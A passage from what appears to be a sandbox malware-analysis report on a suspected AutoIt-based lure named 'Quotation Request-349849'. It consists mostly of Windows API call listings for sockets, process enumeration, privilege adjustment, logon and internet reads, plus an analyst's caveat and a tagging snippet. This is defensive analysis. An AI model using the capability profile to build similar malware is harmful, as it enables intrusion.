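• bind.WSOCK32(00000000,?,00000010), ref: 00846800
Similarity
• String ID:
"""

if __name__ == "__main__":
    print(*tag_report(SAMPLE_REPORT), sep="\n")
```

Run it on the text of this section and each record comes back with the `ref` of its first direct call (the address shown in the listing) and the labels that fired; the Toolhelp32 process enumeration and the `CoCreateInstance` / `.lnk` records below fit the same rule shape. One caveat when reading the labels: the report flags this sample as a likely compiled AutoIt script, so a large share of these records plausibly belong to the bundled interpreter rather than to the script's own logic. A matching rule therefore says the capability is present in the binary, not that the script exercised it; confirm against the report's behaviour sections and the executed-function view before treating a label as observed activity.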
                                                      APIs
                                                        • Part of subcall function 007F0DB6: std::exception::exception.LIBCMT ref: 007F0DEC
                                                        • Part of subcall function 007F0DB6: __CxxThrowException@8.LIBCMT ref: 007F0E01
                                                      • _memmove.LIBCMT ref: 00820258
                                                      • _memmove.LIBCMT ref: 0082036D
                                                      • _memmove.LIBCMT ref: 00820414
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                      • String ID:
                                                      • API String ID: 1300846289-0
                                                      • Opcode ID: c7f16194fb5989daf586d2d3103cd5064cfc4c03f0112e6af66e3cf65b049b83
                                                      • Instruction ID: a40c5570e58cc95bd8a96fb47445c2fd6d6d7bc09a14af1afc1aafa23a766ad3
                                                      • Opcode Fuzzy Hash: c7f16194fb5989daf586d2d3103cd5064cfc4c03f0112e6af66e3cf65b049b83
                                                      • Instruction Fuzzy Hash: 3C02B1B0A00219DBCF04DF69D985ABE7BB5FF48304F54806AE806DB356EB39D950CB91
                                                      APIs
                                                        • Part of subcall function 007D2612: GetWindowLongW.USER32(?,000000EB), ref: 007D2623
                                                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 007D19FA
                                                      • GetSysColor.USER32(0000000F), ref: 007D1A4E
                                                      • SetBkColor.GDI32(?,00000000), ref: 007D1A61
                                                        • Part of subcall function 007D1290: DefDlgProcW.USER32(?,00000020,?), ref: 007D12D8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ColorProc$LongWindow
                                                      • String ID:
                                                      • API String ID: 3744519093-0
                                                      • Opcode ID: a2727307c577ba6d2c750a3cf3c28ad7fbc00a8969c811d7d38fca2f6aaf2f08
                                                      • Instruction ID: a33eb94aa784dbf0154e97bf81a5fb5d32506c112433cf81c3ea8d802c6b209a
                                                      • Opcode Fuzzy Hash: a2727307c577ba6d2c750a3cf3c28ad7fbc00a8969c811d7d38fca2f6aaf2f08
                                                      • Instruction Fuzzy Hash: F6A15BB1106594BEE624AB3C4C58D7F3A7DFF81342B94411BF502E63D6DA2C9D0197B2
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0083BCE6
                                                      • _wcscmp.LIBCMT ref: 0083BD16
                                                      • _wcscmp.LIBCMT ref: 0083BD2B
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0083BD3C
                                                      • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0083BD6C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Find$File_wcscmp$CloseFirstNext
                                                      • String ID:
                                                      • API String ID: 2387731787-0
                                                      • Opcode ID: 76d7027b97beed8ce66b926257e2a8cb57395ea4df5297a6a5f4ee3c9039528d
                                                      • Instruction ID: 203aa7f2c3cafe86a8cd6a1c494f54b9eb6d3aeb5553bc573964662ec002b9db
                                                      • Opcode Fuzzy Hash: 76d7027b97beed8ce66b926257e2a8cb57395ea4df5297a6a5f4ee3c9039528d
                                                      • Instruction Fuzzy Hash: 875178B5604606DFD718DF28C491EAAB3E4FF89324F10465AEA56C73A1DB34ED04CB91
                                                      APIs
                                                        • Part of subcall function 00847D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00847DB6
                                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0084679E
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 008467C7
                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00846800
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 0084680D
                                                      • closesocket.WSOCK32(00000000,00000000), ref: 00846821
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                      • String ID:
                                                      • API String ID: 99427753-0
                                                      • Opcode ID: 29673c2e8d32bc8546165e910320831c990bbcabec5da0f56be0dbf5e96106ba
                                                      • Instruction ID: 419acda106295212de63138a3859cc5cd1bd3a6e889341a42709d49c0afa87d3
                                                      • Opcode Fuzzy Hash: 29673c2e8d32bc8546165e910320831c990bbcabec5da0f56be0dbf5e96106ba
                                                      • Instruction Fuzzy Hash: EA41B675B00214AFDB50BF64888AF2E77B8EF49714F048559FA15AB3C2DA789D008792
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                      • String ID:
                                                      • API String ID: 292994002-0
                                                      • Opcode ID: 6169090604a2eaa2c3d84bcccd18e2a532fa173fed8a5c500d6d06fea181db99
                                                      • Instruction ID: e1f3d943e17c106bf7301c8f4d597fcadbc36f780854b4fc4ee4178320566386
                                                      • Opcode Fuzzy Hash: 6169090604a2eaa2c3d84bcccd18e2a532fa173fed8a5c500d6d06fea181db99
                                                      • Instruction Fuzzy Hash: 4D110431300A11AFDB216F26DC58AAE7BA8FF457A2B404029FD09D3342DB78DD0186A4
                                                      APIs
                                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 008280C0
                                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 008280CA
                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 008280D9
                                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 008280E0
                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 008280F6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                      • String ID:
                                                      • API String ID: 44706859-0
                                                      • Opcode ID: befe523a58c7dd58c68fca84f2ebd629db323e7b2948b062f4987bbae4662355
                                                      • Instruction ID: 8b3afa89f7c2afdaac2b049baa081dd4cccf626b12b2f0e6b6ee8efa8fbd2de0
                                                      • Opcode Fuzzy Hash: befe523a58c7dd58c68fca84f2ebd629db323e7b2948b062f4987bbae4662355
                                                      • Instruction Fuzzy Hash: 30F0C230246314EFEB114FA4EC8CE6B3BACFF49756F440025FA05C3191CB649C55DA60
                                                      APIs
                                                      • CoInitialize.OLE32(00000000), ref: 0083C432
                                                      • CoCreateInstance.OLE32(00862D6C,00000000,00000001,00862BDC,?), ref: 0083C44A
                                                        • Part of subcall function 007D7DE1: _memmove.LIBCMT ref: 007D7E22
                                                      • CoUninitialize.OLE32 ref: 0083C6B7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: CreateInitializeInstanceUninitialize_memmove
                                                      • String ID: .lnk
                                                      • API String ID: 2683427295-24824748
                                                      • Opcode ID: 9b47dc8a5cf65768efdea195a967c6934446ea73a355848c1a03c6d16103bac3
                                                      • Instruction ID: 4f24942ba72e729b391459edbf14679a14e6abd3bfb92aa0903684b688507828
                                                      • Opcode Fuzzy Hash: 9b47dc8a5cf65768efdea195a967c6934446ea73a355848c1a03c6d16103bac3
                                                      • Instruction Fuzzy Hash: DCA14B71204205AFD700EF54C885EABB7F8FF94354F00492EF195972A2EB75EA49CB62
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,007D4AD0), ref: 007D4B45
                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 007D4B57
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                                      • API String ID: 2574300362-192647395
                                                      • Opcode ID: c4e74a2233ee49eeacc39afd76ed4728e61e851d1c1b8a688682f93edb30de1d
                                                      • Instruction ID: 3f30d8a282393ac748c753fa405de18ade726921d9b9e5b18237bc3438854801
                                                      • Opcode Fuzzy Hash: c4e74a2233ee49eeacc39afd76ed4728e61e851d1c1b8a688682f93edb30de1d
                                                      • Instruction Fuzzy Hash: F7D01274A50713DFD7209F31D818B0676E4BF15392B11883B99D5D6251E678D480C655
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 0084EE3D
                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0084EE4B
                                                        • Part of subcall function 007D7DE1: _memmove.LIBCMT ref: 007D7E22
                                                      • Process32NextW.KERNEL32(00000000,?), ref: 0084EF0B
                                                      • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0084EF1A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                      • String ID:
                                                      • API String ID: 2576544623-0
                                                      • Opcode ID: 0408a4808452125a11eeff68a0d0030fc183534f2e33bca1a4052d9d75480412
                                                      • Instruction ID: 80cb0c9d21bc81f152ea9672c9c23cf1f09d32fa27d832d05ae3a82b826e8d65
                                                      • Opcode Fuzzy Hash: 0408a4808452125a11eeff68a0d0030fc183534f2e33bca1a4052d9d75480412
                                                      • Instruction Fuzzy Hash: 22516A71504715ABD310EF24D885E6BB7F8FF98710F10482EF595D72A2EB74A908CB92
                                                      APIs
                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0082E628
                                                      Strings
                                                      Similarity
                                                      • API ID: lstrlen
                                                      • String ID: ($|
                                                      • API String ID: 1659193697-1631851259
                                                      APIs
                                                      • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0084180A,00000000), ref: 008423E1
                                                      • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00842418
                                                      Similarity
                                                      • API ID: Internet$AvailableDataFileQueryRead
                                                      • String ID:
                                                      • API String ID: 599397726-0
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 0083B40B
                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0083B465
                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0083B4B2
                                                      Similarity
                                                      • API ID: ErrorMode$DiskFreeSpace
                                                      • String ID:
                                                      • API String ID: 1682464887-0
                                                      APIs
                                                        • Part of subcall function 007F0DB6: std::exception::exception.LIBCMT ref: 007F0DEC
                                                        • Part of subcall function 007F0DB6: __CxxThrowException@8.LIBCMT ref: 007F0E01
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0082882B
                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00828858
                                                      • GetLastError.KERNEL32 ref: 00828865
                                                      Similarity
                                                      • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                      • String ID:
                                                      • API String ID: 1922334811-0
                                                      APIs
                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00828774
                                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0082878B
                                                      • FreeSid.ADVAPI32(?), ref: 0082879B
                                                      Similarity
                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                      • String ID:
                                                      • API String ID: 3429775523-0
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0083C6FB
                                                      • FindClose.KERNEL32(00000000), ref: 0083C72B
                                                      Similarity
                                                      • API ID: Find$CloseFileFirst
                                                      • String ID:
                                                      • API String ID: 2295610775-0
                                                      APIs
                                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00849468,?,0085FB84,?), ref: 0083A097
                                                      • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00849468,?,0085FB84,?), ref: 0083A0A9
                                                      Similarity
                                                      • API ID: ErrorFormatLastMessage
                                                      • String ID:
                                                      • API String ID: 3479602957-0
                                                      APIs
                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00828309), ref: 008281E0
                                                      • CloseHandle.KERNEL32(?,?,00828309), ref: 008281F2
                                                      Similarity
                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                      • String ID:
                                                      • API String ID: 81990902-0
                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,007F8D57,?,?,?,00000001), ref: 007FA15A
                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 007FA163
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      APIs
                                                      • __time64.LIBCMT ref: 0083889B
                                                        • Part of subcall function 007F520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00838F6E,00000000,?,?,?,?,0083911F,00000000,?), ref: 007F5213
                                                        • Part of subcall function 007F520A: __aulldiv.LIBCMT ref: 007F5233
                                                      Similarity
                                                      • API ID: Time$FileSystem__aulldiv__time64
                                                      • String ID:
                                                      • API String ID: 2893107130-0
                                                      APIs
                                                      • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00834C4A
                                                      Similarity
                                                      • API ID: mouse_event
                                                      • String ID:
                                                      • API String ID: 2434400541-0
                                                      • Opcode ID: 679b7c8ff9ca7d2b5ca974cce6ac1676d6abe29f9ac84861c5535ff9bb442028
                                                      • Instruction ID: 1543de08c02d33a747c6c92ccf73cb8035051ac0c81a2a65c1aad849d108aacd
                                                      • Instruction Fuzzy Hash: 1DD05E9116530D38EC1C07209E0FF7A0108F3C0796FD0B1497201CA1C2ECA87C42A0B1
                                                      APIs
                                                      • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00828389), ref: 008287D1
                                                      Similarity
                                                      • API ID: LogonUser
                                                      • String ID:
                                                      • API String ID: 1244722697-0
                                                      • Opcode ID: cbe889aeb44c189b56927c65499bc206a88e4c4801c100122fd1d3282595300d
                                                      • Instruction ID: 3dcfbe4cfcd81edcde4b846a815f2070857828a200d0d62e0f5263e10956677e
                                                      • Instruction Fuzzy Hash: FAD05E32260A0EABEF018EA4DC01EAE3B69EB04B02F408111FE15C50A1C775D835AB60
                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(?), ref: 007FA12A
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: f47299b513b44a0a9ddd7bdce32cc53438561f8b9ab8e18be5c822f4db8ccd8a
                                                      • Instruction ID: c0e7cc62d71eb6d461770b464d8e9543eee92babb0937b3015ac005303dd6027
                                                      • Instruction Fuzzy Hash: 19A0113000020CAB8A002F82EC08888BFAEEA002A2B008020FA0C802328B32A8208A80
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b3660588643056d90d116caa83c2346d3674ac03fcec6ce024ce3f516ee0346f
                                                      • Instruction ID: 9aa2bca27ba3717b8cb8d79f4485762ef271c6bfef5fb16950c09bd8c024ca67
                                                      • Instruction Fuzzy Hash: 8B2247309059A6CBDF788A1AE89437C77A1FB09304F28C07AD94ACB592DB789DD1C743
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                      • Instruction ID: 3170e4a0e7e6accb5cab6bc82a6b945e0b5a6ec955b0bc1d5ae38e507cbf5335
                                                      • Instruction Fuzzy Hash: 7BC1B8322050974ADF2D463AC43403EFBB16EA27B135A075DD9B3CF6D5EE28C926D620
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                      • Instruction ID: 2785c90c925a043928653eee5c639d1991e770c6392605c43f40ba59ea7c4c0f
                                                      • Instruction Fuzzy Hash: 80C1E6322050974ADF2D463AC43403EFBA16FA27B135A076DD5B3DF6D5EE28C926D620
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                      • Instruction ID: d297d62befc72840bb8e940312cbbdf14f78c7a87dcda0b6a8d203c74959da2f
                                                      • Instruction Fuzzy Hash: 98C1A53230519789DF2D463AC43403EFBB16EA27B179A076DD5B3CB6C4EE28C925D620
                                                      APIs
                                                      • DeleteObject.GDI32(00000000), ref: 0084785B
                                                      • DeleteObject.GDI32(00000000), ref: 0084786D
                                                      • DestroyWindow.USER32 ref: 0084787B
                                                      • GetDesktopWindow.USER32 ref: 00847895
                                                      • GetWindowRect.USER32(00000000), ref: 0084789C
                                                      • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 008479DD
                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 008479ED
                                                      • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00847A35
                                                      • GetClientRect.USER32(00000000,?), ref: 00847A41
                                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00847A7B
                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00847A9D
                                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00847AB0
                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00847ABB
                                                      • GlobalLock.KERNEL32(00000000), ref: 00847AC4
                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00847AD3
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00847ADC
                                                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00847AE3
                                                      • GlobalFree.KERNEL32(00000000), ref: 00847AEE
                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00847B00
                                                      • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00862CAC,00000000), ref: 00847B16
                                                      • GlobalFree.KERNEL32(00000000), ref: 00847B26
                                                      • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00847B4C
                                                      • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00847B6B
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00847B8D
                                                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00847D7A
                                                      Similarity
                                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                      • API String ID: 2211948467-2373415609
                                                      • Opcode ID: 54dda8b6233c34fdb5037e7b4c5ead7f87c2a9ce685ae7c9e4bae8be8b3ac03d
                                                      • Instruction ID: 8deb4dc667128d71b582f98612fd4d58374e3ab33acd6facdd896a31eada243d
                                                      • Instruction Fuzzy Hash: 82023B71900219EFDB14DFA4DD89EAE7BB9FB48311F148169FA15EB2A1C7389D01CB60
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?,0085F910), ref: 00853627
                                                      • IsWindowVisible.USER32(?), ref: 0085364B
                                                      Similarity
                                                      • API ID: BuffCharUpperVisibleWindow
                                                      • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                      • API String ID: 4105515805-45149045
                                                      • Opcode ID: d25f21b4ff0d40415d98de02dbdde2652012513e30846057d3dae979d1d3f6a7
                                                      • Instruction ID: 5b6d642217372ae210f88330a833c0341e70ee4a196d1e6f92f71237ba32715e
                                                      • Instruction Fuzzy Hash: AAD17970204705DBCA04EF14C559A6E7BE1FF94395F048469FD82DB3A2DB25EA4ECB82
                                                      APIs
                                                      • SetTextColor.GDI32(?,00000000), ref: 0085A630
                                                      • GetSysColorBrush.USER32(0000000F), ref: 0085A661
                                                      • GetSysColor.USER32(0000000F), ref: 0085A66D
                                                      • SetBkColor.GDI32(?,000000FF), ref: 0085A687
                                                      • SelectObject.GDI32(?,00000000), ref: 0085A696
                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 0085A6C1
                                                      • GetSysColor.USER32(00000010), ref: 0085A6C9
                                                      • CreateSolidBrush.GDI32(00000000), ref: 0085A6D0
                                                      • FrameRect.USER32(?,?,00000000), ref: 0085A6DF
                                                      • DeleteObject.GDI32(00000000), ref: 0085A6E6
                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 0085A731
                                                      • FillRect.USER32(?,?,00000000), ref: 0085A763
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0085A78E
                                                        • Part of subcall function 0085A8CA: GetSysColor.USER32(00000012), ref: 0085A903
                                                        • Part of subcall function 0085A8CA: SetTextColor.GDI32(?,?), ref: 0085A907
                                                        • Part of subcall function 0085A8CA: GetSysColorBrush.USER32(0000000F), ref: 0085A91D
                                                        • Part of subcall function 0085A8CA: GetSysColor.USER32(0000000F), ref: 0085A928
                                                        • Part of subcall function 0085A8CA: GetSysColor.USER32(00000011), ref: 0085A945
                                                        • Part of subcall function 0085A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0085A953
                                                        • Part of subcall function 0085A8CA: SelectObject.GDI32(?,00000000), ref: 0085A964
                                                        • Part of subcall function 0085A8CA: SetBkColor.GDI32(?,00000000), ref: 0085A96D
                                                        • Part of subcall function 0085A8CA: SelectObject.GDI32(?,?), ref: 0085A97A
                                                        • Part of subcall function 0085A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0085A999
